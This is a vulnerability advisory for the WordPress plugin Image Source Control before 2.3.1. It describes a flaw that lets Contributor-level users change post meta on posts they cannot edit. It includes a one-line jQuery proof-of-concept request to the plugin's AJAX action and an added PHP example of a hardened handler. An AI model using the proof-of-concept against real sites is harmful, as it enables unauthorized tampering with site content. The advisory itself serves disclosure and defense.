WordPress Plugin Vulnerabilities
Image Source Control < 2.3.1 - Contributor+ Arbitrary Post Meta Value Change
Description
The plugin allows users with a role as low as Contributor to change arbitrary post meta fields of arbitrary posts, including posts they should not be able to edit.
Proof of Concept
Run while in the Post/Page editor as a contributor:

jQuery.post(ajaxurl, { action: "isc_save_meta", nonce: iscData.nonce, id: 781, key: "metadata_change_poc", value: "meta changed" })
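The request above succeeds because a valid nonce is treated as sufficient; the server-side checks that close this class of bug are sketched below as an added example, which is not the plugin's code and not its 2.3.1 fix. It assumes it runs inside WordPress; the nonce action name, the function name and the allowlisted meta key are hypothetical, and only the AJAX action name `isc_save_meta` comes from this page.

```php
<?php
// Added example: hypothetical hardened handler, not Image Source Control's code.
// Only the AJAX action name "isc_save_meta" is taken from the advisory.

const EXAMPLE_NONCE_ACTION = 'example_isc_save_meta';          // hypothetical name
const EXAMPLE_ALLOWED_KEYS = array( 'example_image_source' );  // hypothetical key

add_action( 'wp_ajax_isc_save_meta', 'example_save_meta' );

function example_save_meta() {
	// 1. CSRF check only. The nonce is handed to any user who can open the
	//    editor, so it says nothing about that user's rights over the post
	//    named in the request.
	check_ajax_referer( EXAMPLE_NONCE_ACTION, 'nonce' );

	$post_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
	$key     = isset( $_POST['key'] ) ? sanitize_key( wp_unslash( $_POST['key'] ) ) : '';
	$value   = isset( $_POST['value'] ) ? sanitize_text_field( wp_unslash( $_POST['value'] ) ) : '';

	// 2. Object-level authorization: the caller must be able to edit this
	//    specific post. A Contributor passes for their own drafts and fails
	//    for other users' posts and for published content.
	if ( ! $post_id || ! get_post( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) {
		wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
	}

	// 3. Key allowlist: the client never chooses which meta field is written
	//    outside the set the feature actually needs.
	if ( ! in_array( $key, EXAMPLE_ALLOWED_KEYS, true ) ) {
		wp_send_json_error( array( 'message' => 'meta key not allowed' ), 400 );
	}

	update_post_meta( $post_id, $key, $value );
	wp_send_json_success();
}
```

With these checks the request from the Proof of Concept is rejected twice over: at step 2 if the contributor cannot edit post 781, and at step 3 because `metadata_change_poc` is not an allowlisted key.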
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)